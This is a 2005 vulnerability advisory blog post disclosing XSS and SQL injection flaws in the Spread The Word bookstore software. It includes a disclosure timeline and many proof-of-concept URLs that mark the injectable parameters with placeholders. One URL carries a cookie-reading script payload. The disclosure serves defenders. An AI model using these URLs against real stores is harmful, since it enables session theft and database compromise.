####################################################
Spread The Word (comersus based bookstore ) multiple
script and variables XSS and SQL Injections vulnerabilities.
vendor url:http://www.stwm.com/opportunity.asp
advisore url:http://lostmon.blogspot.com/2005/05/
spread-word-multiple-xss-and-sql.html
vendor notified:yes exploit available: yes
BID:13733 and 13737
####################################################
Spread The Word (comersus based bookstore ) contains a flaw that
allows a remote cross site scripting attack.This flaw exists because
the application does not validate multiple variables upon submission
to multiple scripts.This could allow a user to create a specially
crafted URL that would execute arbitrary code in a user's browser
within the trust relationship between the browser and the server,
leading to a loss of integrity.
##############
versions:
##############
I can´t established what version are affected.
##############
solution:
##############
no solution was available at this time.
##############
timeline
##############
discovered: 17 oct 2004
vendor notify: 08 april 2005
vendor response: 11 april 2005
disclosure: 24 may 2005
####################
proof of concepts:
####################
Some files have diferent prefix like STW
ej: 'ShowContent.asp' in others stores are 'STWShowContent.asp'
#####################
BrowseCategories.asp
#####################
XSS,sql errors and path disclosure.
http://[target]/store/BrowseCategories.asp?Cat0=783&
Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible[XSS-here]
http://[target]/store/BrowseCategories.asp?Cat0=783
&Cat0Literal=Gifts&Cat1=839[XSS-here]&Cat1Literal=Bible
http://[target]/store/BrowseCategories.asp?Cat0=783
&Cat0Literal=Gifts[XSS-here]&Cat1=839&Cat1Literal=Bible
http://[target]/store/BrowseCategories.asp?Cat0=783[XSS-here]
&Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible
http://[target]/store/BrowseCategories.asp?Cat0=783[SQL-INJECTION]
&Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible
http://[target]/store/BrowseCategories.asp?Cat0=783&Cat0Literal=
Gifts&Cat1=839[SQL-INJECTION]&Cat1Literal=Bible
Cat0literal can be books, videos,gifts,bibles,or other categories similars listed in the cart.
#############
search.asp
#############
XSS,sql errors and path disclosure.
http://[target]/store/Search.asp?SearchType=565
[SQL-INJECTION]&strSearch=lalala
http://[target]/store/Search.asp?InStock=[XSS-here]
&SearchType=783&strSearch=i&SearchCat1=-1&SearchCat2=
-1&PriceMin=&PriceMax=&PublicationDate=-1
http://[target]/store/Search.asp?InStock=&SearchType=
783&strSearch=[XSS-here]&SearchCat1=-1&SearchCat2=
-1&PriceMin=&PriceMax=&PublicationDate=-1
http://[target]/store/Search.asp?InStock=&SearchType=783
&strSearch=lol&SearchCat1=-1[XSS-here]&SearchCat2=-1
&PriceMin=&PriceMax=&PublicationDate=-1
http://[target]/store/Search.asp?InStock=&SearchType=783
&strSearch=lol&SearchCat1=-1&SearchCat2=-1[XSS-here]&
PriceMin=&PriceMax=&PublicationDate=-1
http://[target]/store/Search.asp?InStock=&SearchType=783
&strSearch=lol&SearchCat1=-1&SearchCat2=-1&PriceMin=
[XSS-here]&PriceMax=&PublicationDate=-1
http://[target]/store/Search.asp?InStock=&SearchType=783
&strSearch=lol&SearchCat1=-1&SearchCat2=-1&PriceMin=
&PriceMax=[XSS-here]&PublicationDate=-1
http://[target]/store/Search.asp?InStock=&SearchType=783
&strSearch=1&SearchCat1=-1&SearchCat2=-1&PriceMin=
&PriceMax=&PublicationDate='
##################
AdvancedSearch.asp
##################
http://[target]/store/AdvancedSearch.asp?strSearch=
[XSS-CODE]&SearchType=-1&SearchCat1=-1&SearchCat2=
-1&Author=dd&PublicationDate=-1&PriceMin=1&PriceMax=
111111111&B1=Submit
##################
ViewItem.asp
##################
XSS,sql errors and path disclosure.
http://[target]/store/ViewItem.asp?ISBN=
0789906651[XSS-here]&Cat0=565
http://[target]/store/ViewItem.asp?ISBN=
0789906651&Cat0=565[XSS-here]
http://[target]/store/ViewItem.asp?ISBN=
0789906651[SQL-INJECTION]&Cat0=565
http://[target]/store/ViewItem.asp?ISBN=0789906651
&Cat0=565[SQL-INJECTION]
####################
STWShowContent.asp
###################
XSS ,sql errors and path disclosure.
http://[target]/store/STWShowContent.asp?
idRightPage=13032[XSS-CODE]
http://[target]/store/STWShowContent.asp?
idRightPage=13032[SQL-INJECTION]
http://[target]/store/STWShowContent.asp
###################
MySide.Asp
###################
XSS,sql errors and path disclosure.
http://[target]/store/MySide.Asp?Cat0=565
&Cat0Literal=Bibles[XSS-CODE]
http://[target]/store/MySide.Asp?Cat0=565
[SQL-INJECTION]&Cat0Literal=Bibles
#################
BrowseMain.asp
#################
XSS ,sql errors and path disclosure.
http://[target]/store/BrowseMain.asp?Cat0=565
[XSS-CODE]&Cat0Literal=Bibles&CurHigh=4
http://[target]/store/BrowseMain.asp?Cat0=565
&Cat0Literal=Bibles[XSS-CODE]&CurHigh=4
http://[target]/store/BrowseMain.asp?Cat0=565
[SQL-INJECTION]&Cat0Literal=Bibles&CurHigh=4
http://[target]/store/BrowseMain.asp?Cat0=783
&Cat0Literal=Gifts&CurHigh=3"><
script>alert(document.cookie)</script>
################
others
################
XSS
http://[target]/store/NewCustomer.asp?newemail=
zzzz@lalala.es&RedirectURL=[XSS-CODE]
http://[target]/store/Login.asp?RedirectURL=[XSS-code]
Also it´s posible to we can inject sql or XSS code in 'Cat0' variable
or 'Cat1' in all files where this variables are used.
Also it´s posible to we can inject XSS code in 'Cat0literal' variable
or 'Cat1literal' in all files where this variables are used.
################### End ################
thnx to estrella to be my ligth
Thnx to icaro he is my Shadow !!!
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente
Subscribe to:
Posts (Atom)